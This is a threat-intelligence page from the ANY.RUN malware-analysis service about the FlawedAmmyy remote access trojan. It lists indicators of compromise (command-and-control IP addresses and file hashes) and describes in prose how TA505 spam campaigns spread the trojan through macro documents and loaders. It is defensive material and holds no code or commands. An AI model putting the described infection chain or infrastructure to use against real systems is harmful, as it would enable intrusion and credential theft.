Black friday Up to 3 extra licenses FOR FREE + Special offer for TI LOOKUP Get it now
Webinar
February 26
Better SOC with Interactive Sandbox Practical Use Cases
Register now
106
Global rank
149 infographic chevron month
Month rank
130 infographic chevron week
Week rank
0
IOCs

FlawedAmmmyy is a RAT type malware that can be used to perform actions remotely on an infected PC. This malware is well known for being featured in especially large campaigns with wide target demographics.

Trojan
Type
Unknown
Origin
1 January, 2016
First seen
31 October, 2020
Last seen

How to analyze FlawedAmmyy with ANY.RUN

Type
Unknown
Origin
1 January, 2016
First seen
31 October, 2020
Last seen

IOCs

IP addresses
185.99.132.119
185.99.132.12
185.99.133.83
185.99.133.140
Hashes
f55f04cdc44a691f6189dadc5e358ec3a931178d791833061a6beb7159a7169e
2b8d1c99f8a142009066d4de303c812e1954e3d5682afb9c7ad308b2220892b1
5eddc55c0c445baf2752d56229fa384b7e3f1c7e76b22f43e389c6a711aa713a
a19da580fbae5b2c5d7ea5491391a98be1496277c757b4971134b03cefeb4de3
233e1b4e94179045a1de0472235a447e0da924517ce7f4ee2f82f9ba1c6cd0b1
34a45ec826f44c493c92b0722ad20e677894a0a7ed59cff74be4389581d160e3
d67c7ef1c8e2cd56e266902bef814ac328d64bbe06086f4ee24fbadbebf39605
0e66554997149a9e7f17f56fb722fb74a5f9656bf210eb6f1c9ba8b760653fa7
5fc600351bade74c2791fc526bca6bb606355cc65e5253f7f791254db58ee7fa
c2c6f548fe6832c84c8ab45288363b78959d6dda2dd926100c5885de14c4708b
6e53d7e07e04b718825f6ab209a74ecbcfc6285097f0c0f9d332e8c0f54e1097
8baeed8d30b9bfbff3adda3496df1552ab4bed3a7092cb7b56543f9b844b0353
46385856face3b237d98f7df44ac5ba45481dfd9f02792ec5949682bdca57a8d
eba919bc08482cb84f86a895a696c9cf939e3f7aa5207855e7bfd46071c20063
618e2117679aed87c4090d1d8211a8eafe059e174552e1518534b706776d032d
bb147398db2dc7944677a3d453037c07612785a83bf35c42ecd405bedcca1aeb
7fa767226435efb051f3efee68ca0feb8683285efe1bafcfdb12c26bb965deda
c3deba131c0397cb6dc978b1a5e0978cd6d29c9dd618e6781255dd8ec73c1450
526582ad66a0f96cfac8dd11841ba499a34310efbca37799d9217abe6beca88c
155ca9b5d31ab7db2cbf130c98c49a9c1f6f8580fea1ff21740f5c977639955e
Last Seen at

Recent blog posts

post image
Efficient SOC: How to Detect and Solve Incide...
watchers 563
comments 0
post image
ANY.RUN & Palo Alto Networks Cortex XSOAR...
watchers 661
comments 0
post image
Lazarus Group Attacks in 2025: Here's Everyth...
watchers 4086
comments 0

What is FlawedAmmyy malware?

FlawedAmmyy is a Remote Access Trojan – a malware that is utilized by attackers to take full control over the target machine. It is based on the source code of a completely legitimate program Ammyy Admin. Despite this RAT being recorded as a new malware in 2018, some researchers suggest that it has been in use since 2016.

FlawedAmmyy has been used by multiple attackers in massive email-spam campaigns as well as in highly targeted cyber attacks aimed at businesses in the automotive industry. Among others, a well-known hacker operating under the alias TA505 is known to have been using this malware in large-scale campaigns.

General description of FlawedAmmyy malware

Being built using leaked source code of the third version of Ammyy Admin – which is legitimate remote access and administration program – Flawed Ammyy enables attackers to perform multiple actions on infected Windows PCs. With this malware, hackers can control the desktop remotely, manipulate files, steal credentials, and access audio on an infected machine to potentially collect information about their victims.

The popularity of FlawedAmmy started rising especially quickly in 2018, as the focus of malicious actors started shifting from operating ransomware to other types of malicious programs. In particular, in November of 2018, a threat actor known as TA505 started distributing various loader viruses in their spam email campaigns – using ServHelper at first and later switching to AndroMut – with the end goal of infecting victims with FlawedAmmyy.

In particular, researchers have detected two separate campaigns that distributed FlawedAmmyy using AndroMut loader – the first campaign targeted victims in South Korea with HTML attachments designed to download an Office file with malicious macros which installed a loader which would, in turn, drop the main payload – FlawedAmmyy RAT. The scope of other campaigns featuring AndroMut was more broad and included enterprises in the USA, UAE, and Singapore.

Other campaigns not necessarily by TA505 that took place in 2019 made use of an XLM document that contained a malicious macro that downloaded FlawedAmmyy directly, bypassing the loader stage.

FlawedAmmyy malware analysis

A video recorded in the ANY.RUN malware hunting service displays the execution process of FlawedAmmyy, allowing one to examine it in a convenient and safe environment.

flawedammyy execution process graph

Figure 1: Displays the graph of processes generated by the ANY.RUN malware analyzing service

text report of the flawedammyy analysis

Figure 2: Even more information about the execution of malware can be found in customizable text reports generated by ANY.RUN

FlawedAmmyy execution process

Usually, Flawed Ammyy makes its way into the machine through mail spam in a form of a MS Word or MS Excel document with a malicious macro. Examples of such malicious docs you can find on ANY.RUN's public submissions browsing by tag maldoc-21. After the malicious .xls file is opened, it automatically runs a macro function that runs either msiexec.exe or cmd.exe to download and execute the first stage payload. This first stage executable file then downloads and decrypts another file, which usually has a filename "wsus.exe" and it is the FlawedAmmyy malware itself. Wsus.exe creates persistence in the system and communicates with C2 servers.

Sometimes malicious executable files are digitally signed with a certificate from trusted vendors. Also, it's interesting that trojan checks the user privileges and presence of Anti-Virus programs on the infected machine and changes behavior based on the results of this check. You can also find out how this execution method differs from Trickbot and Zloader.

Distribution of FlawedAmmyy RAT

FlawedAmmyy is distributed with spam email campaigns with subjects usually concerning invoices or receipts. Emails can contain a .zip attachment disguised to contain information related to the email subject, a Microsoft Office file, or an XML attachment. Attached files, in reality, can hold a URL that automatically opens a browser window and redirects victims to a website from where malware samples would be downloaded.

In some campaigns, another virus designed to install the final payload is downloaded first and it then drops FlawedAmmyy onto the machine. Other campaigns made use of something called the Server Message Block (SMB) protocol to download malware directly, bypassing the browser download which is quite a rare trick for malware.

How to prevent FlawedAmmyy attacks?

Once FlawedAmmyy infects a PC, it can operate discreetly without letting users know that their machine is in fact infected. This allows attackers to collect various information about their victims over time and makes this malware potentially very destructive.

However, adhering to simple online safety tips can make avoiding the infection fairly easy – as long as a user never clicks on suspicious links or downloads emails from unknown senders they will be safe. However, things get a little bit more complicated with FlawedAmmy since some of the attacks are very targeted and feature believable emails.

Therefore users are advised to conduct their own checks about email authenticity and pay attention to small details before downloading files or following URLs in their correspondence.

How to export FlawedAmmyy data using ANY.RUN?

Analysts can export all significant events from a task to MISP for further analysis and export to IDS/SIEM systems or simply for share. Just click on the "Export" button and choose "MIST JSON format" in the drop-down menu.

export events from the task with flawedammyy into MISP JSON Figure 3: Export events from the task with flawedammyy into MISP JSON

Summary

FlawedAmmyy RAT is an interesting malware that is capable of operating stealthily on infected machines and causing potentially serious damage with its remote access capabilities. It was featured both in massive, large-scale email spam campaigns as well as in targeted attacks against businesses operating in particular industries which indicates the diversity that operators behind this malware can show in regard to choosing their victims.

Security researchers only documented this malware in 2018 despite its being around since 2016, which means that it managed to operate in the dark for two whole years, evading researchers or maybe even tricking them. Thankfully, modern malware analysis services like ANY.RUN provides multiple specially designed tools to simplify and greatly streamline the research process to help us identify current and future threats.

HAVE A LOOK AT

Spyware screenshot
Spyware
spyware
Spyware is a stealth form of malware whose primary objective is to gather sensitive information, such as personal data, login credentials, and financial details, by monitoring user activities and exploiting system vulnerabilities. Spyware operates secretly in the background, evading detection while transmitting collected data to cybercriminals, who can then use it for malicious purposes like identity theft, financial fraud, or espionage.
Read More
Phobos screenshot
Phobos
phobos ransomware
Phobos is a ransomware that locks or encrypts files to demand a ransom. It uses AES encryption with different extensions, which leaves no chance to recover the infected files.
Read More
Sliver screenshot
Sliver
sliver
Sliver is an open-source command-and-control (C2) framework that has been increasingly adopted by threat actors as an alternative to tools like Cobalt Strike. Developed by security firm Bishop Fox, Sliver was initially intended for legitimate security testing and red teaming exercises. However, its robust features and open-source nature have made it attractive to malicious actors seeking to control compromised systems.
Read More
BlackMatter screenshot
BlackMatter
blackmatter
BlackMatter is a ransomware strain operating as a Ransomware-as-a-Service (RaaS), designed to encrypt files, remove recovery options, and extort victims across critical industries. Emerging in 2021, it quickly became a major concern due to its ability to evade defenses, spread across networks, and cause large-scale operational disruption, forcing security teams to act against a highly destructive and persistent threat.
Read More
Maze screenshot
Maze
maze ransomware
Maze is ransomware — a malware type that encrypts the victim’s files and restores the data in exchange for a ransom payment. One of the most distinguishable features of Maze is that it is one of the first malware of the kind to publicly release stolen data.
Read More
Gh0st RAT screenshot
Gh0st RAT
gh0st
Gh0st RAT is a malware with advanced trojan functionality that enables attackers to establish full control over the victim’s system. The spying capabilities of Gh0st RAT made it a go-to tool for numerous criminal groups in high-profile attacks against government and corporate organizations. The most common vector of attack involving this malware begins with spam and phishing emails.
Read More